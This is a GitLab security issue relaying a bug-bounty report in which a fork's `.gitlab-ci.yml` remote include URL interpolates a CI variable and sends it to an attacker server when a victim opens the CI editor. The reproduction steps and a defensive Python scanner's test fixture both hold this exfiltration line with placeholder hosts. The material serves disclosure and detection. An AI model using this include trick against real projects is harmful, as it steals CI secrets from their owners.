Backend: Leaking CI variables by visiting the CI Editor via fork MRs
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1890451 by shells3c
on 2023-03-02, assigned to GitLab Team
Report
SSOT
Refer to #417275 (closed)
Summary
By clicking on a link, project members can leak CI variables of their project to hackers
Steps to reproduce
- [Victim account] Create a project, create a CI variable in General > CI/CD > Variables named `xxx_variable`
- [Attacker account] Fork the project, and edit the CI configuration (`.gitlab-ci.yml` by default) with the following content (replace `<ATTACKER SERVER>` with your server):

  ```yaml
  include:
    remote: 'http://<ATTACKER SERVER>/${xxx_variable}.yaml'
  ```

- [Attacker account] Create a merge request with the previous change, save the commit SHA
- [Victim account] Visit this link (with `<sha>` replaced) and the variable will be sent to the attacker server: `https://gitlab.com/<user>/<project>/-/ci/editor?branch_name=<sha>`
Output of checks
This bug happens on GitLab.com
Impact
Steal CI variables by one click
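The primitive the report relies on is an `include:remote` URL that interpolates a CI/CD variable: GitLab expands project variables inside `include` URLs, so when the config is resolved in the victim project's context the variable's value becomes part of an HTTP request to a host the attacker chose. That pattern is easy to spot in a fork's `.gitlab-ci.yml` before anyone opens it in the CI editor. The scanner below is an added example written for this page, not GitLab's code; it walks the top-level `include:` block line by line (no YAML library needed) and reports every URL there that references a `$VAR`, `${VAR}` or `%VAR%`. The sample configs, the host `attacker.example` and the function name `find_variable_remote_includes` are constructed for the example.

```python
import re
from typing import List, Tuple

# Constructed sample: the shape of the fork's .gitlab-ci.yml from the report,
# with a placeholder host instead of the attacker's real server.
MALICIOUS_CI = """\
include:
  remote: 'http://attacker.example/${xxx_variable}.yaml'

build:
  script:
    - echo build
"""

# Constructed sample: a benign config. A variable used inside a job script is
# expanded at job run time on the runner, not at include-resolution time, so it
# must not be flagged.
BENIGN_CI = """\
include:
  - remote: 'https://gitlab.example.com/templates/common.yml'
  - local: '.gitlab/ci/lint.yml'

build:
  script:
    - echo "$CI_COMMIT_SHA"
"""

URL_RE = re.compile(r'https?://[^\s\'"]+')
# $VAR, ${VAR} and %VAR% (the Windows-runner form) are all expansion syntaxes.
VAR_RE = re.compile(r'\$\{?[A-Za-z_][A-Za-z0-9_]*\}?|%[A-Za-z_][A-Za-z0-9_]*%')


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def find_variable_remote_includes(config: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, url, variables) for every URL inside the top-level
    `include:` block that interpolates a CI/CD variable.

    The scan is deliberately line oriented: it only needs to know whether a
    line sits under a top-level `include:` key, which indentation tells us.
    """
    findings: List[Tuple[int, str, List[str]]] = []
    in_include = False
    for lineno, raw in enumerate(config.splitlines(), start=1):
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = _indent(raw)
        if indent == 0 and re.match(r"include\s*:", stripped):
            in_include = True          # also covers `include: 'http://...'` on one line
        elif in_include and indent == 0:
            in_include = False         # next top-level key ends the include block
        if not in_include:
            continue
        for match in URL_RE.finditer(raw):
            url = match.group(0)
            variables = VAR_RE.findall(url)
            if variables:
                findings.append((lineno, url, variables))
    return findings


if __name__ == "__main__":
    for name, cfg in (("malicious", MALICIOUS_CI), ("benign", BENIGN_CI)):
        hits = find_variable_remote_includes(cfg)
        print(f"{name}: {len(hits)} variable-interpolating include URL(s)")
        for lineno, url, variables in hits:
            print(f"  line {lineno}: {url}  <- expands {', '.join(variables)}")
```

Run against a fork MR's config before it is linted or opened in the editor; any hit is worth a human look, since even a predefined `CI_*` variable in a remote include URL leaks to the named host, and a project or group variable such as `xxx_variable` is the case the report demonstrates.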
How To Reproduce
Please add reproducibility information to this section:
Proposal
Please read this thread: #394964 (comment 1416011415)
Edited by Mark Nuzzo